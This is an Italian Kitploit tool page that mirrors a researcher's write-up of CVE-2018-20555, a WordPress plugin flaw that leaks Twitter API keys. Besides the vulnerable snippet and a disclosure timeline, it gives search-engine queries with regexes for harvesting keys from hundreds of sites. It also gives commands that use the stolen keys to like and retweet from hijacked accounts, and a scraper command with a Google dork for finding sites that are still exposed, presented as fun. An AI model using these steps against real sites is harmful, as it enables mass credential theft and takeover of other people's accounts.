Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-20555 — Vulnerabilità del plugin Social Network Tabs di WordPress - CVE-2018-20555 | Kitploit
Strumenti/GitHubGitHub/fs0c131y/cve-2018-20555
OSINT (Open Source Intelligence)Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniCrawler
GitHubfs0c131y/cve-2018-20555

CVE-2018-20555

Vulnerabilità del plugin Social Network Tabs di WordPress - CVE-2018-20555

Vedi Repository
71187 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2018-20555

Il plugin WordPress chiamato Social Network Tabs, creato dall'azienda Design Chemical, rilascia due volte l'access_token, l'access_token_secret, la consumer_key e la consumer_secret di Twitter dei propri utenti, portando alla compromissione del loro account Twitter.

Ciò è causato dalle seguenti righe di codice nella pagina in cui viene mostrato il widget di Twitter:

root@kitploit:~
jQuery(document).ready(function ($) {
	var config = {
		widgets: "twitter,facebook,youtube",
		twitterId: "[redacted]",
		facebookId: "[redacted]",
		youtubeId: "[redacted]",
		twitter: {
			url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
			title: "Latest Tweets",
			follow: "Follow",
			followId: "",
			limit: "10",
			retweets: true,
			replies: true,
			images: "thumb",
			consumer_key: "[redacted]",
			consumer_secret: "[redacted]",
			access_token: "[redacted]",
			access_token_secret: "[redacted]"
		},
	}
});

Sfruttamento

Grazie a Publicwww, con le seguenti query di ricerca, sono riuscito a recuperare l'access_token, l'access_token_secret, la consumer_key e la consumer_secret di Twitter da 539 siti web vulnerabili:

  • dcwp_twitter.php access_token_secret snipexp:|access_token: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|access_token_secret: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_key: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_secret: "([\w\d-._]+)"|

Tutte le chiavi sono disponibili in twitter_keys.csv.

Come fare

Testa le chiavi API di Twitter in twitter_keys.csv

root@kitploit:~
python test_twitter_api_keys.py -t

La prima volta che ho eseguito questo comando, ho ottenuto le informazioni di 446 account Twitter. Vale la pena notare che nella lista c'erano 2 account verificati e diversi account con più di 10.000+ follower. Tutti gli account vulnerabili sono in vulnerable_accounts.txt.

Parte divertente

Metti mi piace al tweet che preferisci

root@kitploit:~
python test_twitter_api_keys.py -l [tweet_id]

Fai retweet del tweet che preferisci

root@kitploit:~
python test_twitter_api_keys.py -r [tweet_id]

La prima volta che ho eseguito questo comando, sono riuscito a mettere mi piace al tweet scelto 127 volte, il che ha dimostrato che 127 chiavi API di Twitter avevano i permessi di lettura e scrittura, cioè sono stato in grado di prendere il controllo di 127 account Twitter (cambiare l'immagine del profilo, mettere mi piace, fare retweet, modificare la bio, ...) a causa di questa fuga di chiavi.

AGGIORNAMENTO 17/01/18

Molti siti web e quindi account Twitter sono ancora vulnerabili a questo problema. Per identificarli, ho creato uno scraper

root@kitploit:~
cd TwitterApiKeysSearchEngine/

scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10

Il totale dei risultati per questa query di ricerca su Google è 3550. Nelle prime 9 pagine, sono riuscito a recuperare 78 chiavi (86%). Buon divertimento!

Divulgazione

  • 01/12/18: Divulgazione a Twitter
  • 0X/12/18: Twitter ha disattivato tutte le chiavi
  • 11/12/18: Riconosciuto da Twitter come problema di sicurezza valido

Contatti

Seguimi su Twitter! Puoi anche trovare una piccola parte del mio lavoro su https://fs0c131y.com

Crediti

L'indagine e il POC sono stati realizzati con ❤️ da @fs0c131y

Scarica lo strumento